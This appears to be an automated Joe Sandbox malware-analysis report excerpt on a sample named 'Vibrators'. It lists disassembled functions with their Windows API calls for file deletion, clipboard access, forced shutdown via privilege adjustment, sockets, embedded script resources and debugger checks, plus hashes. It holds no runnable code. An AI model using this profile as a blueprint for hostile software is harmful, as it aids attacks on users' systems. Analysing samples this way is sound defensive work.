RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A7CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A7CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00A7CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00A7CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A7CDE2
RegCloseKey.ADVAPI32(00000000), ref: 00A7CDEF

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: afec5a32ab04beb1fdabf6cfa6cf99a54bc4dc2c633615d056468c09f4266e0d
Instruction ID: 4e5fc1fb558798e61f0c7e5bdbda4bed9f147706cf45d6e23100ce060553a7ba
Opcode Fuzzy Hash: afec5a32ab04beb1fdabf6cfa6cf99a54bc4dc2c633615d056468c09f4266e0d
Instruction Fuzzy Hash: 0D024D71604204AFD715DF28C895E2ABBE5EF89314F18C49DF84ACB2A2DB31ED42CB51

Function 00A5D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009F5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F55D1,?,?,00A34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 009F5871

Part of subcall function 00A5EAB0: GetFileAttributesW.KERNEL32(?,00A5D840), ref: 00A5EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00A5D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00A5DA88
MoveFileW.KERNEL32(?,?), ref: 00A5DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00A5DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A5DAE2

Part of subcall function 00A5DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00A5DAC7,?,?), ref: 00A5DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00A5DAFE
FindClose.KERNEL32(00000000), ref: 00A5DB0F

Strings

\*.*, xrefs: 00A5D978, 00A5D981, 00A5D996

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: cb5e7827e5c7d522b28d02b0c11ef3b662e701fed24f9cef1d3d7c8a96c8264d
Instruction ID: f64d24a28e28d7d4d0abed72f81c79a3342f541f359abe40d59e1ad0c91392f5
Opcode Fuzzy Hash: cb5e7827e5c7d522b28d02b0c11ef3b662e701fed24f9cef1d3d7c8a96c8264d
Instruction Fuzzy Hash: 9D61497180510DAACF15EFA0CA92AFDB7B5BF54341F2040A9E906B7192EB315F0ACB61

Function 00A6F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A6F7EE
EmptyClipboard.USER32 ref: 00A6F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00A6F809
CloseClipboard.USER32 ref: 00A6F900

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: addd569eeb03bb4d0a7489a455dd1896a454deae53b99e2a509e683571b37de8
Instruction ID: 1eff6cbb810b6d53bb96145d8b16cccf2255454acb8f0e4d76911f88fceacf44
Opcode Fuzzy Hash: addd569eeb03bb4d0a7489a455dd1896a454deae53b99e2a509e683571b37de8
Instruction Fuzzy Hash: 1F419A31604615AFD310DF55E888F15BBF4EF44328F14C0A9E8298F6A2DB35EC42CB90

Function 00A5F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00A52010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5205A
Part of subcall function 00A52010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A52087
Part of subcall function 00A52010: GetLastError.KERNEL32 ref: 00A52097

ExitWindowsEx.USER32(?,00000000), ref: 00A5F249

Strings

SeShutdownPrivilege, xrefs: 00A5F219
@, xrefs: 00A5F23C
, xrefs: 00A5F273
, xrefs: 00A5F237

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: ec7db8739a2dedcb6a4c4527842bbcdeb995c42631720babf6994f139f19dc39
Instruction ID: 4b1be6ce4d5f568e80f0289f4558c08fefb685d5580d168441a8786c6d37cfa0
Opcode Fuzzy Hash: ec7db8739a2dedcb6a4c4527842bbcdeb995c42631720babf6994f139f19dc39
Instruction Fuzzy Hash: 4D01D6BA6112106FEB2463B89D8AFFF736CBB08346F150931FD03E21D2E5704D099690

Function 00A2BCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A2BD54
_free.LIBCMT ref: 00A2BD78
_free.LIBCMT ref: 00A2BEFF
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00A946D0), ref: 00A2BF11
WideCharToMultiByte.KERNEL32(00000000,00000000,00AC221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A2BF89
WideCharToMultiByte.KERNEL32(00000000,00000000,00AC2270,000000FF,?,0000003F,00000000,?), ref: 00A2BFB6
_free.LIBCMT ref: 00A2C0CB

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 9f40b7262397b18b0c7fcccb4c740de01edf5392747c436f45c339a7e2c35c76
Instruction ID: d99c097ff3543b117ee858c6716e45bea4aa9873c9ab096af9c1b8432a9f94f1
Opcode Fuzzy Hash: 9f40b7262397b18b0c7fcccb4c740de01edf5392747c436f45c339a7e2c35c76
Instruction Fuzzy Hash: C0C12831910225AFDB20DF7CEE41BEA7BB9EF41310F1545BAE5919B291E7308E42CB60

Function 00A63A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00A356C2,?,?,00000000,00000000), ref: 00A63A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00A356C2,?,?,00000000,00000000), ref: 00A63A35
LoadResource.KERNEL32(?,00000000,?,?,00A356C2,?,?,00000000,00000000,?,?,?,?,?,?,009F66CE), ref: 00A63A45
SizeofResource.KERNEL32(?,00000000,?,?,00A356C2,?,?,00000000,00000000,?,?,?,?,?,?,009F66CE), ref: 00A63A56
LockResource.KERNEL32(00A356C2,?,?,00A356C2,?,?,00000000,00000000,?,?,?,?,?,?,009F66CE,?), ref: 00A63A65

Strings

SCRIPT, xrefs: 00A63A2B

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 6c1abfe20c399f7ac626f9e16f8d08cf303b8744d606d551fea442571c5589ec
Instruction ID: 903e0f65d871b0b0a6403406716d16cddea0a738757715e23eb52c90f775f6b4
Opcode Fuzzy Hash: 6c1abfe20c399f7ac626f9e16f8d08cf303b8744d606d551fea442571c5589ec
Instruction Fuzzy Hash: 33113C71200701BFDB258BA5DC48F677BBDEFC5B91F14466DB442961A0DBB2D902D620

Function 00A520AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A51900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A51916
Part of subcall function 00A51900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A51922
Part of subcall function 00A51900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A51931
Part of subcall function 00A51900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A51938
Part of subcall function 00A51900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A5194E

GetLengthSid.ADVAPI32(?,00000000,00A51C81), ref: 00A520FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A52107
HeapAlloc.KERNEL32(00000000), ref: 00A5210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00A52127
GetProcessHeap.KERNEL32(00000000,00000000,00A51C81), ref: 00A5213B
HeapFree.KERNEL32(00000000), ref: 00A52142

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 23c78f1bef9794d6c5b863cfe420ba39d3d8a92d297723bef2fcae98ff8a2896
Instruction ID: 060305da935c3d626a1142396c9edbd325b19bca9988fe9b54e1af9d8f637d3f
Opcode Fuzzy Hash: 23c78f1bef9794d6c5b863cfe420ba39d3d8a92d297723bef2fcae98ff8a2896
Instruction Fuzzy Hash: 4E11DC71501604EFDB24DBA4DC08BAF7BB9FF52356F104218E942931A0C7319909CB60

Function 00A6A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 009FB329: _wcslen.LIBCMT ref: 009FB333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00A6A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00A6A6D0

Part of subcall function 00A642B9: GetInputState.USER32 ref: 00A64310
Part of subcall function 00A642B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A643AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00A6A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00A6A6BA

Strings

*.*, xrefs: 00A6A5A2

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 6f87ea49fa80a93978e52ad986e4fb23b13a0622cab4e5a994114d4c19739247
Instruction ID: c5e8e1e31336a4b54a49c566c2a32abd5b1e1d1714d6cf049009a5484d38f2e5
Opcode Fuzzy Hash: 6f87ea49fa80a93978e52ad986e4fb23b13a0622cab4e5a994114d4c19739247
Instruction Fuzzy Hash: D04171B590020EAFCF14EFA4CD49AEEBBB4EF54310F144056E906B2191EB309E54CF61

Function 009F22AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 009F233E
GetSysColor.USER32(0000000F), ref: 009F2421
SetBkColor.GDI32(?,00000000), ref: 009F2434

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 337ee32d17f4436eeaf2e24ca19344c9adee01393f54e1f35a46c0e6d6e86a42
Instruction ID: a29b4350d01bd571621e0c44f71127060855a5cf30cafc1ff0972c47e43e3316
Opcode Fuzzy Hash: 337ee32d17f4436eeaf2e24ca19344c9adee01393f54e1f35a46c0e6d6e86a42
Instruction Fuzzy Hash: 0081F5F110850CBEEA29B73C4DA9FBF295EDB82B00F250509F302DA595C99D9F429376

Function 00A72263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A73AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00A73AD7
Part of subcall function 00A73AAB: _wcslen.LIBCMT ref: 00A73AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00A722BA
WSAGetLastError.WSOCK32 ref: 00A722E1
bind.WSOCK32(00000000,?,00000010), ref: 00A72338
WSAGetLastError.WSOCK32 ref: 00A72343
closesocket.WSOCK32(00000000), ref: 00A72372

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 5fa1773b2d75f876a317a94891116dc1159833b210978240d12f0ee1769f29b3
Instruction ID: 57e9fc6ebd40e553aafa0a36fce30775b9f2fe022d21cce1eb46cfc69631b8d1
Opcode Fuzzy Hash: 5fa1773b2d75f876a317a94891116dc1159833b210978240d12f0ee1769f29b3
Instruction Fuzzy Hash: E7519071A00204AFEB10AF64C886F6A77A5AB45718F44C098F9499F3D3C775ED428BE1

Function 00A826DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A8275C
IsWindowEnabled.USER32 ref: 00A8276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00A82777
IsIconic.USER32 ref: 00A82785
IsZoomed.USER32 ref: 00A82793

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 2c228be9461e0cab4d3d4304a50afc4a87abf981c4310cde6a6ccf5dd1765425
Instruction ID: 636db47aef481c3ecb328e79dc7bed1e3a11c9ffa7ca6edb210384b3bc549383
Opcode Fuzzy Hash: 2c228be9461e0cab4d3d4304a50afc4a87abf981c4310cde6a6ccf5dd1765425
Instruction Fuzzy Hash: AB21F1317002159FE710AF2BC844B2A7BE5FF84324F588069E84ACB391DB71EC42CB90

Function 00A6D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00A6D8CE
GetLastError.KERNEL32(?,00000000), ref: 00A6D92F
SetEvent.KERNEL32(?,?,00000000), ref: 00A6D943

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: b9a27196e212c4aa1946634dbf4d5f68aa0bcbfe977669bc536de14296a86ab0
Instruction ID: 54c6bbb0fbc8435ac87a175a1c540c1d64166e84e9a83b543e8dd94d1e40ffa6
Opcode Fuzzy Hash: b9a27196e212c4aa1946634dbf4d5f68aa0bcbfe977669bc536de14296a86ab0
Instruction Fuzzy Hash: 2B21AFB2A00705AFE720DFA5D988BAAB7FCEB40354F10441EE64692591E770EA45CB90

Function 00A5E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00A346AC), ref: 00A5E482
GetFileAttributesW.KERNEL32(?), ref: 00A5E491
FindFirstFileW.KERNEL32(?,?), ref: 00A5E4A2
FindClose.KERNEL32(00000000), ref: 00A5E4AE

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 110a83f54374e96171dd5da1ef75b31be575c2437230da267f4b88b1a5ffdc71
Instruction ID: d1262fd9e5dd42e8a77518235891e4edbb194242b2b0d3dbd16c31aeca80ff33
Opcode Fuzzy Hash: 110a83f54374e96171dd5da1ef75b31be575c2437230da267f4b88b1a5ffdc71
Instruction Fuzzy Hash: 7AF0A03081091057D614E7B8AC0D8AA77BDBE02336B504701FC36C20E0F7799E9A8695

Function 00A4E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A4E5F8

Strings

%.3d, xrefs: 00A4E603
X64, xrefs: 00A4E680

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 9c42286ba292d991211ff8a030c0290d32191d487175f60344616ae01b313545
Instruction ID: 50190742b36bf02759f769b16ed4a0b74026e1a9ccd661cd9509bbef5ee93d6e
Opcode Fuzzy Hash: 9c42286ba292d991211ff8a030c0290d32191d487175f60344616ae01b313545
Instruction Fuzzy Hash: 52D012B5C0810CEACBD0D690AD48CB9F3BCBB58300F254856F906E1040F6259904A721

Function 00A22992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00A22A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00A22A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00A22AA1

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e524dce3e267017262808ba95986cd3fe1a13a591210856af2e59996d01ba0fa
Instruction ID: be34de455f94e810050d1e92eb05749dff511324dc39eeeb014d5da57dd89afd
Opcode Fuzzy Hash: e524dce3e267017262808ba95986cd3fe1a13a591210856af2e59996d01ba0fa
Instruction Fuzzy Hash: A531977590122CABCB21DF68DD897DDBBB4AF18310F5041EAE41CA6261E7709FC58F45

Function 00A52010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00A1014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A109D8
Part of subcall function 00A1014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00A109F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A5205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A52087
GetLastError.KERNEL32 ref: 00A52097

Memory Dump Source

Source File: 0000000B.00000002.2503372679.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000B.00000002.2503344102.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000A8D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503645320.0000000000AB3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503773361.0000000000ABD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2503803496.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9f0000_Vibrators.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 061dd2ada2bc9554a4aa39f8acc05a4c1d6796e6c2587092ee219bfe589f7e53
Instruction ID: c66ffe58dd63773543f80e9e70c6ef51c46f701bf858ec97f94a96956dc1549c
